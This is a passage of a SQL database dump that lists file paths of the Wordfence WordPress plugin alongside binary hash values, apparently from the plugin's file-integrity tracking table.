','C\'r9@Kކtw#@k','',0,'?'),('@~}cQ\'J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%9;%mM6Z','6-2Xjݒ[lÆL	\'8FJ','',0,'?'),('jp\0Z','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸ\rܚ','-ͤE[G4/`rV','',0,'?'),('#ynہ彐[hr\\U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pߓ','d\'_C\'\"Şh3','',0,'?'),('4#հ}','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/D\rmb y_','$+;f7{O/gp~','',0,'?'),('O潼m$݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1z¶~pQ.)!\\','or[AR~~Gu߰QNZk\0QSeO','',0,'?'),('#\' ~/zF','wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XZ\\h=95','.Z2~b8Ȟu','',0,'?'),('EB3A-\r&!T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CG\ndnMv','篺wFO^ `&|p.0E)\ZL','',0,'?'),('sݜÞ3','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nc0)נZ;b','5KO5QJÂPpUW','',0,'?'),('uC~7\nWe','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')OA?fSZp',',m?j❄3T!ⱝ/@','',0,'?'),('mAp	1GU/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q)\Z6ˏr1\n1ڑ','$I.\Zڴ}\'iD50V-B(','',0,'?'),('Fm','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<>sZKze','̆;nE!Z\ZVV Hw','',0,'?'),('k7|dT;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZɵP! r','wXXl@gIz,>W7\rX','',0,'?'),('낏\r?8[9kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8E7CS','dقM.N8U8ࠆOY=wD','',0,'?'),('2?!u܆\"','wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[(AɊh','ͳߘQ6̨!*XxMMu@','',0,'?'),('\Z&cR< FiC','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r%1cvG\\%','-r@Yik~oeɲv*+','',0,'?'),('j\nj<c@BX','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3qטwUͰR','JwYwun[&DFLV-2L','',0,'?'),('I<UCMdZ','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VIބŌ._','ёli߉.N /siTj!l','',0,'?'),('wDI-EIl','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T%a;B3>|CX','B;,y_:$E5B0\0','',0,'?'),('F\ruDb7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pVF&KkH','+.^-$70	]xrv+cgPM','',0,'?'),('|:xZ~*wl','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6G5n;E>','Q2Ƽw|!l?sTMmu*({','',0,'?'),('\rP)4_\"\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nυ	L?06C','\'-OR\"Nxn~l<W','',0,'?'),('*沫QN','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1hIbۓa','6NSNY2m=@ke(!z|g','',0,'?'),('/qRR|','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R!z@;Ve','#l#к;	KAH9Q@	B~','',0,'?'),('$QsPR3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>N.RyEEn','0Q~0Sbgsx:E my\\O','',0,'?'),('8=[ձ','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~PG$!2(s`','פ:yRJ`l|BHw75!','',0,'?'),('CIS7<','wp-content/plugins/wordfence/modules/login-security/views/page/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ш>\\gǡ$c','iiGCNFL)7%ʙ','',0,'?'),('\ZL6N1;8','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"w^\nk6','!5@a6to5(Ds\nKf','',0,'?'),('g[z\0ή','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MQ@ǮI','~rbwTNs;3fB)A','',0,'?'),('T\rfV+ j','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxXJTbx','fx/xG\n856	Z+','',0,'?'),('˩6f/6YjI\0W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XUt\\HD','w>Ȗ@UFg݃{=-ڪ5','',0,'?'),('Yg$zH.Y','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uD~Fe	U',';\ne@dw`4g\r','',0,'?'),('dkJQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aTSs3+','d%lk@^)(Jyĳ8nD','',0,'?'),('vFI2hn','wp-content/plugins/wordfence/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jxMxLi[\"','&sU]o0D\'ިoZ\r,鲵l','',0,'?'),(';Lt׬Cɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iz~i,L','	HQIqzڤp9C4>H3G','',0,'?'),('\"C*.','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('=S6aXo,2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nV8\\Bs','7h>8but^^Rx26#i(','',0,'?'),('_k4!*}݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%*T*`','289vu3n	C2sva/','',0,'?'),('0&Y','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('\"0rN1M#','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('t!\Z%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('s˱Y*uO','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qBItӟA<\"','6qQ`d!cf.Bxq','',0,'?'),('~Ӹbc\Z$@$*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*mI','E\0.¿¯1F(Dfuv˔','',0,'?'),('!֐(yJo*J','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B\\BH+)	','84E3I6-9!zGL5','',0,'?'),('k}:VNG','wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x>PHe6[GF5','q!홐%ހP٧Hr.L~','',0,'?'),('p1	?J@','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǧn3Q2G','d\"fݎ6em`zP<KO','',0,'?'),('O=h\0}OrLb','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZU~L5@\ZVU','/rTrmGс\r%e\r|[','',0,'?'),(']mٲ	▭','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w̩	&J)','M,P:k\nN2[s\nWze]oN','',0,'?'),('6N]bNR','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڄ q?s1U','REkks&]!i_\"y~Ka','',0,'?'),('ECW``-','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_@e3bB','Lؤ@J9OhG@@Z!\08#l(','',0,'?'),('ccgu','wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('k|DD*@4','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nAgv1Pص','0o*\rvAo3:juy','',0,'?'),(']jRX','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','//Rj.','3\'X\ro`/D/3\Z','',0,'?'),('ZgUi1iƾx=','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dW,XEEo','l?)&&PP$@\\/','',0,'?'),('{Z\n0D\rOM*Ut','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N	SX?z','Ԧ\nٲLKY1%X7~*','',0,'?'),('퇴u46','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lfk<\r\n','R!O]pI\n\\VP9=!?','',0,'?'),('K?ra#Qh','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IaRɞ%x','M bd]FiPOZq','',0,'?'),('^4j|I','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5H*f$ʝӐ','ƝiczP1\"ݢӛoTWry*F','',0,'?'),('܆R(\'2WhpG','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏHC5̨[\0','Xf:Mt˃#sD4(NGF','',0,'?'),('[0^','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','emgݜ|<뼸Dh','+%G<t1]I5m\Z}E>;','',0,'?'),('vV5ǃDu','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڄ\n1h;!','Mϡ	pk)!\r','',0,'?'),('QKQ95Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y!\\zJX','B*yL˰au\"t\Z4Z۳Nk¥','',0,'?'),('+b\nDfX2YC','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS:-N!Q0\"','6)?^\"F*g|&RΠ\0	','',0,'?'),('eiy,:T)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Q#2ЏR','~G)R7i-#R 9Hǫ b','',0,'?'),('%~WN82QO','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4F0JC nk','Cb,\"\">jŊAlD','',0,'?'),(']r:@I','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6:2kP3','%uMp,.\0@Zqr/Q','',0,'?'),('%D?m1QZ\"cAXQq','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G=1\nV0','8}>k6`uideHP^','',0,'?'),('Dmuϣ!I5H','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pٽP]G','| )YM,30\Z*9p','',0,'?'),('V<r\nQ]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z*Nfټ{','i˶|1v.4[(m@f>','',0,'?'),('J?#͌$M7c','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`I.:`PR','#zR\ZHU>BnP,\'eTtߺ','',0,'?'),('MӼ7T~','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$kA`lwy','7\r4	춥Q\nc>c\n>Pf84Hk','',0,'?'),('wejZqI','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(,Eڎ;','5+SsY>%r975[I=`<2M','',0,'?'),(':1()p]V1-ȩ','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qDLa[	?$','Gs\0\r/1v=pS-yE.U','',0,'?'),('݈3+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',0Z%','g^M9=&*M{Xb0*u','',0,'?'),('\rBeׯE7','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y}`8vFJ','U߆([r嵳gh嬵!m9(\"','',0,'?'),('k1/͓ݐ%=','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dqd6+\"U','Is;֮ikE@)','',0,'?'),('F[㵋Pѳ@','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MbP\"xY@0','\'n*2nԋ)a(_Iqɘ{','',0,'?'),('&ɚ%)W&i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVDm|P6\n','l=b:џ	RZ		6','',0,'?'),('P[DXPa','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';uSl','M>:\r&V`\Z:O0Sv;\0Vw','',0,'?'),('tV<C','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`׳m%','(l]hЮa	yfh0v\'uvm','',0,'?'),('&Yzq[Ff@','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ;*?z',':O.\'~y@Y`FMN:n.;q@','',0,'?'),('`I,y oY','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('d=@hs:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJPe0ug۔','UWMslL9#TbWj?\\u','',0,'?'),('T.)m&I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','41l#}pzk1','h	_֚!E4\ZvF','',0,'?'),('ؽ)uҶewl','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mhOലf.I','oOb9_b-4-x%T5E9\'','',0,'?'),('\Z3H{ǲ','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r Ϭn+n','^qNТ&yN~\'S//>}p','',0,'?'),('])TN25F','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR˗c?qt','֝Rz5B,nɲ\nHoڨ|','',0,'?'),('-[S_عQ','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1:!G~qic','^DCguPT!>W\Zk~_5\n8','',0,'?'),('2]&֔#^Fq','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2΢	/E!<s','\\=53	ώv_%2A?$','',0,'?'),('85\\Rqo-=','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h$x /','<bobnAE7_GK','',0,'?'),('ȿ-`uo','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','am;SV#mI','R9F47i}ʧC^%','',0,'?'),('m>\00X&^Q','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pKz`)9_@','aғYeq7YTcȊi$Wت/!,','',0,'?'),('ۅnPE6T','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KdWؿEW','RW].dasJMLq+p},','',0,'?'),('ӎA}ҎWZ5=*t','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;v\'g~k','m!MJ\"v>,0\0՜ɫ &jِ','',0,'?'),('i\Z![8$\"','wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';8e_TƽW','ݬISP\"a 7J6QSv_y','',0,'?'),('SdlzsV7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V~МIXP/$','sem/;֘ aZH`g3','',0,'?'),('%\\(w&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\0$K  	','Vp\Z1͌э\'=~ٲF_u\\P','',0,'?'),('ϏRCOh','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06.tzxo',';p^\03Թ( Aaw','',0,'?'),('O5e;hzw@W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z<{~Gf(',',ב[\Z@+?xPА','',0,'?'),('k%\r0̯IN6D\'y','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g+کdݬ@','wbjYStc IdQ','',0,'?'),('\Z[`0CI$T\'','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')H$I3^0','Dsmr?vjzMo3=b0KR#','',0,'?'),('~iI;ݭ]AS','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54⓿`','DOo;oO]+\05]/\"޸&Q','',0,'?'),('I6U\r73p','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h<|7b','_^F\";+r&Z~ӦQ|5','',0,'?'),('nvZYV','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`I,Bz1','Q52<iiNKOb2d','',0,'?'),('BJOzD','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{1MRKE_/','|qUUѿÎ|zG>*ۜ\"I;','',0,'?'),('Pdc3','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<i\"KNX,','Cѝ⁪r+^YhjzZ','',0,'?'),('^Q6lJ!	ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d#k','tw}?e	hBT92uCv7','',0,'?'),('߹V=\"#n	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xb#!YiJ','nd@=[cg?N}־Rxl]X','',0,'?'),('rMܴ-\nS','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(wٯ(_','b<Wr,M۫Pp>Nn','',0,'?'),('X/\0	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!^(m0G','9*u1Q: \'s{>/_\'','',0,'?'),('n09jv8\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CVS+:c|O쬋	','t=1i\Zn\0N!*iF','',0,'?'),('ҭ_VlKg!p1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|D#DD3)','h=UuVU-Jށ\'Q;2rg','',0,'?'),('!O4bCRRfO','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zzn','Ei!p\0\'R5R$#','',0,'?'),('IW9aW3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\n4x%$0','^,5؎j,ҧQQhs','',0,'?'),('c[b]ݽJF','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\4','!ʁ)wj%pջڞ56q袌m#w','',0,'?'),('СqD֚?iX','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r!(i.+)Қ\"{','ZQ[QG7؍E\"','',0,'?'),('\'`F̔~Ė','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C؍0+C','`>&i(ŹCf&>Y\"','',0,'?'),('<xB','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8)1%Lzi','G0gXĨ̷u|x)ifWw5;P','',0,'?'),('\n@g+T;V','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\r@)뻚',';_Im1\n9|!޶','',0,'?'),('8K ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZlY^[F\r2xʻ','6=Sq-5 )EL}AViA]','',0,'?'),('xVM>n{Oǟ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96N\Z!JYU',',yS1̥;x5GiO9','',0,'?'),('Aػ#\"j','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W1Dn_\Z','\ZȊ͚\"[%=<F7?h7<','',0,'?'),('Q6K4H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hDg]ov<N','iQƌ\nux\00æp~R/','',0,'?'),('rI\0ygE!2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jl9re.','7\0|$<9&-MBՌ֌','',0,'?'),('j)nQ8ޮD','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{߸\ZĚ','t^17&;*	v[^G*=d$','',0,'?'),('{ \rSlſ	','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),(':f?bj.','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LYPͺK\ne',']SO	o*+uX:ʆw','',0,'?'),('r7/y*aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4JPЩsB','r~5\n̊4GșA','',0,'?'),('fpjH\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˮ_Xk','4>1^fs{q\'	